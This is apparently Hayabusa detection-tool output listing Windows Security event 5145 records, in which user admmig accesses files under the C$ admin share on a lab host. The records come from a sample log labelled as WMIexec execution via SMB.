2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pb378ec07# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pb378ec07#\d9659b5db4bc25a33861dbc0ca19c837 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pcd26229b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pcd26229b#\adfb2cd1f200788f6e0472379725ce7f | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pd3efef62# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pd3efef62#\379936827e72fda4d66f53769c06c9ee | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pefb7a36b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pefb7a36b#\4a462e10f0ca871771e1eba0d4708e2e | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.907 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.R251a4777# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.907 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.R251a4777#\ab7fb35e2fb3e61e15dcaabbd82b7508 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.907 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S0f8e494c# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.922 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S0f8e494c#\97871d486d086e08c66cb7bf9335e012 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.938 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S1bc92e04# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.938 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S1bc92e04#\931ade8881fd66e64743490a332ca6a8 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.938 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S8ca2c749# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.938 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S8ca2c749#\cba0b74c99ed7ace30d99b1ed03059e9 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.953 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S54faafb0# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.953 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S54faafb0#\1ccd3b57c9350fc1afa3ed354290f755 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.969 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S356e1ba0# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.969 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S356e1ba0#\0cf0db1a6758c7e0c0ba05029f155cfa | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.969 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S88747207# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.985 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S88747207#\1c10bd935ecce56f3dada604138983f2 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.985 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Sa56e3556# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.985 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Sa56e3556#\9c705405cffb72e6df411a91a2c062c7 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.985 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Sb6a1f1bc# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.985 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Sb6a1f1bc#\88a7ae331deac4585f47de7e6e4277dc | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.001 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.T9d753d8c# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.001 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.T9d753d8c#\e2e911ae8e5924a9ef63135cd8c6b797 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.001 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Te49ad7d9# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.001 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Te49ad7d9#\f8a02123f968d1ae6940ac5d6a1dd485 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.001 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Te3736ca4# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.001 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Te3736ca4#\e4a04c178babbb8bb5aaf6d60b47d649 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.017 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ud0e65fb9# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.017 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ud0e65fb9#\d90607e7c895999c98edb4043f0073e5 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.017 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.032 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851#\fab34eeddd8d0d9679cce669b2cff4fe | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.032 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V4381984f# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.032 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V4381984f#\1a33211365967c012f504ade4abce1ed | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.032 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Vb0a86591# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.032 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Vb0a86591#\f21bca07e5816f88c1107f51e64caa60 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.048 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Vf4833439# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.048 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Vf4833439#\fb6f372260a08811a4ca7666c60e31e8 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.048 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.VisualC | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.048 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.VisualC\8dd5d48acfdc4ce750166ebe36623926 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.048 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W0bb5dac4# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.048 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W0bb5dac4#\eff9f99a173bfe23d56129e79f85e220 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.063 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2bac6884# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.063 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2bac6884#\98fa0075b3677ec2d6a5e980c8c194e2 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.081 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2d29a719# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.081 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2d29a719#\b04af69b54fb462c4c632d0f508d617b | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
